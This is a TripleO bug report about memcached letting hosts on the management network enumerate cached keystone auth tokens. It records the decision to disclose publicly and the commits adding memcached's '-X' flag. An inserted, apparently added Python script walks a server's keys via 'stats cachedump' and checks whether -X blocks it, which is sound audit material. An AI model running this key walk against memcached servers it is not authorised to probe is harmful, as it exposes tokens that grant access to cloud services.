memcached on under/over clouds can be walked for tokens

Bug #1738835 reported by Derek Higgins
Affects   Status         Importance   Assigned to     Milestone
tripleo   Fix Released   High         Derek Higgins

Bug Description

memcached in various versions of tripleo contains keystone auth tokens which
can be retrieved by a host on the same network.

Memcached in tripleo is running in such a way as to allow users to walk and read the contents. As memcached contains keystone tokens, a user with access to the service (e.g. on the management network) can read those tokens.

Revision history for this message
Derek Higgins (derekh) wrote :

After discussing with various stakeholders, as this requires access to trusted networks we're happy that this doesn't require an embargo. So I propose making it public and fixing in the open.

Revision history for this message
Jeremy Stanley (fungi) wrote :

Switching to a public workflow makes sense in light of this only being vulnerable to attackers with access to privileged infrastructure networks. If this were a reported vulnerability in a vulnerability:managed deliverable for OpenStack, I would make the same recommendation on the part of the OpenStack VMT.

Revision history for this message
Derek Higgins (derekh) wrote :

I sent a PR to puppet-memcached to start the ball rolling here
https://github.com/saz/puppet-memcached/pull/90

Once it's merged I'll switch to the public workflow and send patches for the openstack bits

Revision history for this message
Derek Higgins (derekh) wrote :

The patch to memcached is merged and now in a promoted repository so I'm going to make this public and push some patches to use it

information type: Private Security → Public
Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix proposed to instack-undercloud (master)

Fix proposed to branch: master
Review: https://review.openstack.org/538986

Changed in tripleo:
assignee: nobody → Derek Higgins (derekh)
status: New → In Progress
Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix proposed to tripleo-heat-templates (master)

Fix proposed to branch: master
Review: https://review.openstack.org/538987

Changed in tripleo:
importance: Undecided → High
milestone: none → queens-rc1
tags: added: pike-backport-potential
information type: Public → Public Security
Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to instack-undercloud (master)

Reviewed: https://review.openstack.org/538986
Committed: https://git.openstack.org/cgit/openstack/instack-undercloud/commit/?id=a4d6987c744be2ff207e0299e5cb52126cfa9ad3
Submitter: Zuul
Branch: master

commit a4d6987c744be2ff207e0299e5cb52126cfa9ad3
Author: Derek Higgins <email address hidden>
Date: Wed Dec 13 15:30:48 2017 +0000

    Disable memcached's cachedump

    To prevent users walking the memcached keys, add "-X".

    Partial-Bug: #1738835

    Change-Id: I363c8faefcb4ce5153030e36498a7a7961520b01
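
The walk described in the bug description above, together with a check that the "-X" flag this commit adds has actually taken effect, as an added Python example. This is not code from the bug report, TripleO, OpenStack or memcached. It parses memcached's text-protocol replies to "stats items" and "stats cachedump" (the STAT/ITEM/END line formats are memcached's documented ones) and treats a CLIENT_ERROR or ERROR reply to cachedump as the sign that dumping is disabled. The sample replies and the "tokens/..." key names are constructed for illustration and are not keystone's real key naming; the exact error wording memcached returns under -X is assumed, so the check keys only on the error prefix. walk_keys() needs a reachable memcached and is not exercised by the samples.

```python
"""Walk a memcached instance via the text protocol and detect the -X hardening.

Added example for this bug report; not code from TripleO, OpenStack or
memcached. The reply formats ("STAT items:<slab>:number <n>",
"ITEM <key> [<bytes> b; <expiry> s]", "END") are memcached's text protocol.
ASSUMPTION: the exact error text returned for "stats cachedump" when
memcached is started with -X may vary by version, so the check only keys
on the CLIENT_ERROR / ERROR prefix.
"""
import re
import socket
from typing import List, Tuple

ITEM_RE = re.compile(r"^ITEM (\S+) \[(\d+) b; (\d+) s\]$")
SLAB_RE = re.compile(r"^STAT items:(\d+):number (\d+)$")

# Constructed sample replies (not captured from a real tripleo node).
# The "tokens/..." key names are illustrative, not keystone's real naming.
SAMPLE_STATS_ITEMS = (
    "STAT items:5:number 2\r\n"
    "STAT items:5:age 120\r\n"
    "STAT items:9:number 1\r\n"
    "STAT items:9:age 30\r\n"
    "END\r\n"
)
SAMPLE_CACHEDUMP_OPEN = (
    "ITEM tokens/0123456789abcdef [1408 b; 1513176000 s]\r\n"
    "ITEM tokens/fedcba9876543210 [1391 b; 1513176120 s]\r\n"
    "END\r\n"
)
# Assumed wording of the refusal from a memcached started with -X.
SAMPLE_CACHEDUMP_BLOCKED = "CLIENT_ERROR stats cachedump not allowed\r\n"


def parse_slab_ids(stats_items_reply: str) -> List[int]:
    """Slab class ids that currently hold items, from a 'stats items' reply."""
    slabs = []
    for line in stats_items_reply.splitlines():
        m = SLAB_RE.match(line.strip())
        if m and int(m.group(2)) > 0:
            slabs.append(int(m.group(1)))
    return slabs


def parse_cachedump(reply: str) -> List[Tuple[str, int, int]]:
    """(key, size_bytes, expiry_epoch) for each ITEM line of a cachedump reply.

    Raises PermissionError when the server refuses the dump, which is what a
    memcached started with -X does.
    """
    lines = [l.strip() for l in reply.splitlines() if l.strip()]
    if lines and lines[0].startswith(("CLIENT_ERROR", "ERROR", "SERVER_ERROR")):
        raise PermissionError(lines[0])
    items = []
    for line in lines:
        m = ITEM_RE.match(line)
        if m:
            items.append((m.group(1), int(m.group(2)), int(m.group(3))))
    return items


def dump_is_blocked(cachedump_reply: str) -> bool:
    """True if the reply shows cachedump is disabled (the fix this bug adds)."""
    try:
        parse_cachedump(cachedump_reply)
    except PermissionError:
        return True
    return False


def _command(sock: socket.socket, cmd: str) -> str:
    """Send one text-protocol command; read until END or a one-line error reply."""
    sock.sendall(cmd.encode("ascii") + b"\r\n")
    buf = b""
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
        if buf.endswith(b"END\r\n"):
            break
        if buf.startswith((b"CLIENT_ERROR", b"ERROR", b"SERVER_ERROR")) and buf.endswith(b"\r\n"):
            break
    return buf.decode("utf-8", errors="replace")


def walk_keys(host: str = "127.0.0.1", port: int = 11211) -> List[str]:
    """Enumerate every key the server will reveal, slab by slab (limit 0 = all).

    Returns [] and prints why when -X is in force. Needs network access; the
    constructed samples above show what the replies look like.
    """
    keys: List[str] = []
    with socket.create_connection((host, port), timeout=5) as sock:
        for slab in parse_slab_ids(_command(sock, "stats items")):
            reply = _command(sock, "stats cachedump %d 0" % slab)
            if dump_is_blocked(reply):
                print("cachedump refused (memcached -X in effect): %s" % reply.strip())
                return []
            keys.extend(key for key, _, _ in parse_cachedump(reply))
    return keys


if __name__ == "__main__":
    import sys
    for key in walk_keys(sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"):
        print(key)
```

Run it against a node's management-network address before and after the fix: an unpatched memcached answers each "stats cachedump" with ITEM lines for every key in the slab, which is the walk the bug describes, while one started with -X refuses the command. -X also disables "lru_crawler metadump", the other key-enumeration path in recent memcached, so an audit that wants to be thorough should try that command as well; and since -X only stops enumeration, keys that an attacker can guess or learn elsewhere are still readable with a plain "get", which is why the discussion above still treats reachability of the service from untrusted networks as the real boundary.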

Changed in tripleo:
milestone: queens-rc1 → rocky-1
Changed in tripleo:
milestone: rocky-1 → rocky-2
Changed in tripleo:
milestone: rocky-2 → rocky-3
Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Change abandoned on tripleo-heat-templates (master)

Change abandoned by Emilien Macchi (<email address hidden>) on branch: master
Review: https://review.openstack.org/538987
Reason: The gate is having serious troubles with docker.io, we need to abandon this patch so it leaves the gate and when it's stable again I will restore this patch. Please do not restore or do anything, I'll take care of it as soon as things work again.

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to tripleo-heat-templates (master)

Reviewed: https://review.openstack.org/538987
Committed: https://git.openstack.org/cgit/openstack/tripleo-heat-templates/commit/?id=317ed3194e8d30c7701a6793e81ba1f76d1e0b12
Submitter: Zuul
Branch: master

commit 317ed3194e8d30c7701a6793e81ba1f76d1e0b12
Author: Derek Higgins <email address hidden>
Date: Tue Dec 12 14:59:37 2017 +0000

    Disable memcached's cachedump

    To prevent users walking the memcached keys, add "-X"
    to memcached in both containerized and puppet memcached
    overcloud services.

    Change-Id: I50eefdbdf7a7911f2ba6a7f3b4e739b8e67a7c1c
    Partial-Bug: #1738835

Changed in tripleo:
milestone: rocky-3 → rocky-rc1
Changed in tripleo:
milestone: rocky-rc1 → stein-1
Changed in tripleo:
milestone: stein-1 → stein-2
Changed in tripleo:
milestone: stein-2 → stein-3
Changed in tripleo:
status: In Progress → Won't Fix
status: Won't Fix → Fix Released